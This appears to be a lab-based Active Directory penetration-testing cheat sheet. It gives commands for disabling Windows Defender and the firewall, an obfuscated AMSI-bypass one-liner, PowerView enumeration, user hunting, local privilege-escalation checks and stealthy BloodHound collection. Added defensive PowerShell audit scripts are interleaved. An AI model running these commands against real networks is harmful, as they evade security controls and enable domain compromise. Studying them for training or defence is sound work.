# Commands

## RunAs

```
runas /user:chichocorp.local\mrdesdes powershell.exe
```

## Execution Policy

```
powershell -ep bypass
```

## Disable Windows Defender

```
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
```

## Disable Firewall

```
netsh advfirewall set allprofiles state off
```
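The two sections above show the settings an attacker flips on a compromised host. The following check is an added example (not part of the original notes) that reports whether either change has happened on the local machine and pulls the Defender events that record it. It assumes the built-in `Defender` and `NetSecurity` modules are present and that event ID 5001 in the Defender operational log still denotes real-time protection being disabled on the build you run it on.

```powershell
# Added example, not from the original notes: report tampering with Defender and the Windows Firewall.
function Get-EndpointProtectionPosture {
    $findings = [System.Collections.Generic.List[string]]::new()

    # Defender preferences: the two switches the section above flips
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($null -eq $pref) {
        $findings.Add('Get-MpPreference unavailable: Defender module missing or service not running')
    } else {
        if ($pref.DisableRealtimeMonitoring) { $findings.Add('Defender real-time monitoring is disabled') }
        if ($pref.DisableIOAVProtection)     { $findings.Add('Defender IOAV (download/attachment) scanning is disabled') }
    }

    # Tamper Protection is what stops an admin from simply running Set-MpPreference; older builds lack the property
    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($status -and $status.PSObject.Properties['IsTamperProtected'] -and -not $status.IsTamperProtected) {
        $findings.Add('Tamper Protection is off')
    }

    # Firewall: "netsh advfirewall set allprofiles state off" leaves all three profiles with Enabled = False
    Get-NetFirewallProfile -ErrorAction SilentlyContinue |
        Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { $findings.Add("Firewall profile '$($_.Name)' is disabled") }

    # Event 5001 in the Defender operational log is written when real-time protection is turned off
    # (assumed event ID; verify against your build). Get-WinEvent errors when nothing matches, hence SilentlyContinue.
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001
        StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Host                = $env:COMPUTERNAME
        Findings            = $findings
        RecentDisableEvents = @($events | Select-Object TimeCreated, Id, Message)
    }
}

Get-EndpointProtectionPosture | Format-List
```

An empty `Findings` list with no recent 5001 events is the expected baseline; anything else is worth correlating with who was logged on at `TimeCreated`.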

## AppLocker

```
PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\> Get-AppLockerPolicy -Effective

Version RuleCollections RuleCollectionTypes
------- --------------- -------------------
      1 {0, 0, 0, 0...} {Appx, Dll, Exe, Msi...}

PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections


PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%PROGRAMFILES%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 06dce67b-934c-454f-a263-2515c8796a5d
Name                : (Default Rule) All scripts located in the Program Files folder
Description         : Allows members of the Everyone group to run scripts that are located in the Program Files folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%WINDIR%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name                : (Default Rule) All scripts located in the Windows folder
Description         : Allows members of the Everyone group to run scripts that are located in the Windows folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow
```
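Reading the effective policy tells you which rules exist; it does not tell you what a given file would actually get. The following is an added example (not from the original notes) that exports the merged policy and asks `Test-AppLockerPolicy` for the decision on a list of candidate paths, bound to the same `Everyone` SID (`S-1-1-0`) the rules above use. It assumes the AppLocker PowerShell module (Windows 8 / Server 2012 and later); the three paths at the bottom are constructed placeholders.

```powershell
# Added example, not part of the original notes: evaluate candidate files against the effective AppLocker policy.
function Test-EffectiveAppLockerPolicy {
    param(
        [Parameter(Mandatory)] [string[]] $Path,
        [string] $User = 'S-1-1-0'     # Everyone, the SID the rules above are bound to
    )
    # Write the merged local + domain policy to XML once; Test-AppLockerPolicy evaluates against that file
    $xmlPath = Join-Path $env:TEMP 'effective-applocker.xml'
    Get-AppLockerPolicy -Effective -Xml | Out-File -FilePath $xmlPath -Encoding utf8

    # PolicyDecision is Allowed / Denied / AllowedByDefault / DeniedByDefault; MatchingRule names the rule that fired
    Test-AppLockerPolicy -XmlPolicy $xmlPath -Path $Path -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

# PowerShell's language mode is the other half of the picture: ConstrainedLanguage (as in the output above)
# means the interpreter itself is honouring the AppLocker script rules
"LanguageMode: $($ExecutionContext.SessionState.LanguageMode)"

# Constructed example paths; substitute the scripts and binaries you actually need to verify
Test-EffectiveAppLockerPolicy -Path @(
    "$env:ProgramFiles\Vendor\deploy.ps1",
    "$env:USERPROFILE\Downloads\tool.ps1",
    "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe"
) | Format-Table -AutoSize
```

Publisher and hash rules need the file to exist on disk to be evaluated; path rules such as the two `(Default Rule)` entries above are decided from the string alone.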

## AMSI Bypass

{% code overflow="wrap" %}

```
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}

## Import RSAT

```
PS C:\AD\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools\ADModule-master> cd .\ActiveDirectory\
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
```

## Log in to a PC

```
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
```

## Domain Enumeration

{% code overflow="wrap" lineNumbers="true" %}

```
# Getting domain information
Get-DomainComputer -Domain chichocorp.local

# Getting trusts
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

Get-ADTrust
Get-ADTrust -Identity chichocorp.local

# Getting the forest
Get-Forest
Get-Forest -Forest chichocorp.local

# Getting all global catalogs of the forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Get forest domains
Get-ForestDomain
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
Get-ForestDomain -Forest chichocorp.local | %{Get-DomainTrust -Domain $_.Name}

# Get domain policy for the current domain
(Get-DomainPolicyData).systemaccess
(Get-DomainPolicyData -Domain chichocorp.local).systemaccess

# Get domain controllers for the current domain
Get-DomainController -Domain chichocorp.local

# Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity mrdesdes

# Get list of all properties for users in the current domain
Get-DomainUser -Identity mrdesdes -Properties *
Get-DomainUser -Properties samaccountname,logonCount

# Search for a particular string in a user's attributes
Get-DomainUser -LDAPFilter "Description=*password*" | Select name,Description

# Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server*" | select name,operatingsystem
Get-DomainComputer -ping
Get-DomainComputer -ping | select Name

# Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain chichocorp.local

# Get all groups containing the word "admin" in the group name
Get-DomainGroup *admin*
Get-DomainGroup *admin* | select Name

# Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName

# Get the group membership for a user
Get-DomainGroup -UserName "mrdesdes"

# List all the local groups on a machine (needs administrator privs on non-DC machines)
Get-NetLocalGroup -ComputerName desktop-828ljno

# Get members of the local group "Administrators" on a machine (needs administrator privs on non-DC machines)
Get-NetLocalGroupMember -ComputerName desktop-828ljno -GroupName Administrators

# Get actively logged-on users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName desktop-828ljno
Get-NetLoggedon -ComputerName desktop-828ljno | select UserName

# Get locally logged-on users on a computer (needs remote registry on the target - started by default on server OS)
Get-LoggedonLocal -ComputerName desktop-828ljno

# Get the last logged-on user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName desktop-828ljno

# Find shares on hosts in the current domain
Invoke-ShareFinder -Verbose

# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

# Get all file servers of the domain
Get-NetFileServer
```

{% endcode %}
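The `Description=*password*` search above is worth running as a recurring hygiene check, not only during an engagement: account descriptions are readable by every authenticated user, so any credential left there is effectively public. The following is an added example (not part of the original notes) that performs the same search through plain ADSI, so it needs neither PowerView nor the RSAT module, and wraps the filter in the parentheses LDAP expects. The `$Pattern` list and the `$SearchRoot` parameter are this example's own assumptions.

```powershell
# Added example, not from the original notes: find user accounts whose description looks like it holds a credential.
function Find-DescriptionSecret {
    param(
        # Substrings to look for in the description attribute (constructed defaults; extend as needed)
        [string[]] $Pattern = @('pass', 'pwd', 'contrase'),
        # Optional search base, e.g. 'LDAP://DC=chichocorp,DC=local'; defaults to the current domain
        [string] $SearchRoot
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    if ($SearchRoot) { $searcher.SearchRoot = [ADSI]$SearchRoot }

    # One substring clause per pattern, OR'ed together, restricted to user objects (samAccountType 805306368)
    $clauses = ($Pattern | ForEach-Object { "(description=*$_*)" }) -join ''
    $searcher.Filter = "(&(samAccountType=805306368)(|$clauses))"
    $searcher.PageSize = 1000      # paged search so large domains return every hit, not just the first 1000
    $searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'description', 'distinguishedname'))

    foreach ($r in $searcher.FindAll()) {
        [pscustomobject]@{
            SamAccountName    = [string]$r.Properties['samaccountname'][0]
            Description       = [string]$r.Properties['description'][0]
            DistinguishedName = [string]$r.Properties['distinguishedname'][0]
        }
    }
}

# Usage: every row returned is an account whose description should be cleaned and whose password should be rotated
Find-DescriptionSecret | Format-Table -AutoSize
```

Running it as an unprivileged domain user shows exactly what any other domain user (or anything running as one) can read.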

## GPOs

{% code lineNumbers="true" %}

```
# Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO -ComputerIdentity desktop-828ljno

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity desktop-828ljno

# Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity mrdesdes -Verbose

# Get OUs in a domain
Get-DomainOU

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{6AC1786C-016F-11D2-945F-00C04fB984F9}"
```

{% endcode %}

## ACLs

{% code overflow="wrap" lineNumbers="true" %}

```
# Get the ACLs associated with the specified object
Get-DomainObjectAcl -SamAccountName mrdesdes -ResolveGUIDs

# Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=chichocorp,DC=local" -ResolveGUIDs -Verbose

# We can also enumerate ACLs using the ActiveDirectory module but without resolving GUIDs
# (This one doesn't work for me)
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=chichocorp,DC=local').Access

# Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

# Get the ACLs associated with the specified path
Get-PathAcl -Path "\\chichocorp.local\sysvol"
Get-PathAcl -Path "\\desktop-828ljno.chichocorp.local\c$"
```

{% endcode %}
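The `AD:` PSDrive used by `Get-Acl` above only exists once the ActiveDirectory module is loaded. The following is an added example (not from the original notes) that reads an object's DACL directly through ADSI instead, and keeps only the ACEs that would let a non-administrative principal take the object over (GenericAll, GenericWrite, WriteDacl, WriteOwner). The trusted-principal patterns and the helper name are this example's own assumptions; GUIDs are not resolved, as in the page's own `Get-Acl` variant.

```powershell
# Added example, not part of the original notes: flag high-impact ACEs on an AD object via ADSI.
function Get-RiskyAdAce {
    param(
        # e.g. 'CN=Administrator,CN=Users,DC=chichocorp,DC=local'
        [Parameter(Mandatory)] [string] $DistinguishedName,
        # Principals expected to hold these rights; anything else is reported (constructed defaults)
        [string[]] $TrustedPrincipalPattern = @(
            '^NT AUTHORITY\\SYSTEM$', '\\Domain Admins$', '\\Enterprise Admins$', '^BUILTIN\\Administrators$'
        )
    )

    $entry = [ADSI]"LDAP://$DistinguishedName"
    $acl   = $entry.ObjectSecurity      # System.DirectoryServices.ActiveDirectorySecurity

    # Ask for SIDs rather than NTAccount names so orphaned SIDs do not abort the whole call
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    $risky = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner'

    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $sid = $ace.IdentityReference
        try   { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $sid.Value }   # unresolvable SID: keep the raw value, it is still worth reviewing

        if ($TrustedPrincipalPattern | Where-Object { $who -match $_ }) { continue }

        $rights = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
        $hit    = $rights | Where-Object { $risky -contains $_ }
        if ($hit) {
            [pscustomobject]@{
                Object     = $DistinguishedName
                Principal  = $who
                Rights     = ($hit -join ',')
                Inherited  = $ace.IsInherited
                ObjectType = $ace.ObjectType   # all-zero GUID = applies to the whole object, otherwise a specific attribute/right
            }
        }
    }
}

# Usage against the same object the notes query with Get-Acl
Get-RiskyAdAce -DistinguishedName 'CN=Administrator,CN=Users,DC=chichocorp,DC=local' | Format-Table -AutoSize
```

Inherited entries usually come from the parent OU or the domain head, so a hit with `Inherited = True` is fixed at the container, not on the object itself.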

## Trusts

```
# Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

# Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest chichocorp.local
(Get-ADForest).Domains

# Get all global catalogs for the current forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local
```

## User Hunting

{% code overflow="wrap" lineNumbers="true" %}

```
# Find all machines on the current domain where the current user has local admin access.
# This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then uses multi-threaded Invoke-CheckLocalAdminAccess on each machine.
Find-LocalAdminAccess -Verbose

# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

# Find computers where a domain admin session is available and the current user has admin access (uses Test-AdminAccess)
Find-DomainUserLocation -CheckAccess

# Find computers (File Servers and Distributed File Servers) where a domain admin session is available
Find-DomainUserLocation -Stealth

# List sessions on remote machines (https://github.com/Leo4j/InvokeSessionHunter)
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt
```

{% endcode %}

## Privilege Escalation - Local

```
# Get services with unquoted paths and a space in their name
Get-UnquotedService -Verbose

# Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify.
Get-ModifiableService -Verbose

# Run all checks from PowerUp
Invoke-AllChecks
```
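`Get-UnquotedService` reports services whose `ImagePath` is unquoted and contains a space, which makes the Service Control Manager probe several shorter paths before the real one. The following is an added example (not from the original notes) that finds the same condition with only built-in cmdlets and, for each hit, prints the intermediate paths the SCM would try and the `sc.exe config` line that quotes the path properly; the function name and the decision to skip everything under `%WINDIR%` are this example's own assumptions.

```powershell
# Added example, not part of the original notes: audit and remediate unquoted service paths with built-ins only.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $p = $_.PathName
        if (-not $p -or $p.StartsWith('"')) { return }                       # already quoted, nothing to do

        # Split the executable from its arguments; the executable ends at the first ".exe"
        if ($p -notmatch '^(?<exe>[^"]+?\.exe)(?<arguments>.*)$') { return }
        $exe = $Matches.exe
        $arguments = $Matches.arguments                                      # capture before any further -match

        if ($exe -notmatch ' ') { return }                                   # no space, SCM resolves it unambiguously
        if ($exe -match '^[A-Za-z]:\\Windows\\') { return }                  # assumption: %WINDIR% is not user-writable

        # Each prefix up to a space is a candidate the SCM tries (with .exe appended) before the real binary
        $parts = $exe -split ' '
        $triedFirst = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }

        [pscustomobject]@{
            Name            = $_.Name
            StartMode       = $_.StartMode
            RunsAs          = $_.StartName
            PathName        = $p
            PathsTriedFirst = $triedFirst
            # Remediation: rewrite binPath with the executable quoted; arguments stay outside the inner quotes
            Fix             = "sc.exe config `"$($_.Name)`" binPath= `"\`"$exe\`"$arguments`""
        }
    }
}

# Usage: review the parent directories of PathsTriedFirst for write access by non-admins, then apply Fix
Get-UnquotedServicePath | Format-List
```

Services that run as `LocalSystem` with `StartMode = Auto` are the ones to fix first, since a planted binary in one of the tried paths would start as SYSTEM at the next boot.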

## Feature Abuse

```
Jenkins - lab
```

## BloodHound

* Provides a graphical user interface for the AD entities and relationships collected by its ingestors.
* Uses graph theory to map the shortest path to interesting targets such as Domain Admins.
* Ships with built-in queries for frequently used actions.
* Also supports custom Cypher queries.

```
# Import SharpHound
. .\SharpHound.ps1

# Run all methods
Invoke-BloodHound -CollectionMethod All
SharpHound.exe

# To make BloodHound collection stealthy
Invoke-BloodHound -Stealth
SharpHound.exe --stealth

# To avoid detections like MDI
Invoke-BloodHound -ExcludeDCs
```

### Install BloodHound (Parrot)

{% embed url="https://bloodhound.readthedocs.io/en/latest/installation/linux.html" %}

BUT: make one change to the installation, replacing the following command:

```
echo 'deb https://debian.neo4j.com stable 4' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null
```

With:

```
echo 'deb https://debian.neo4j.com stable latest' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null
```

After importing the .zip into BloodHound it should end up like this:

![BloodHound after importing the collected .zip](/files/e37eOxwQmKQUxMVafuQW)


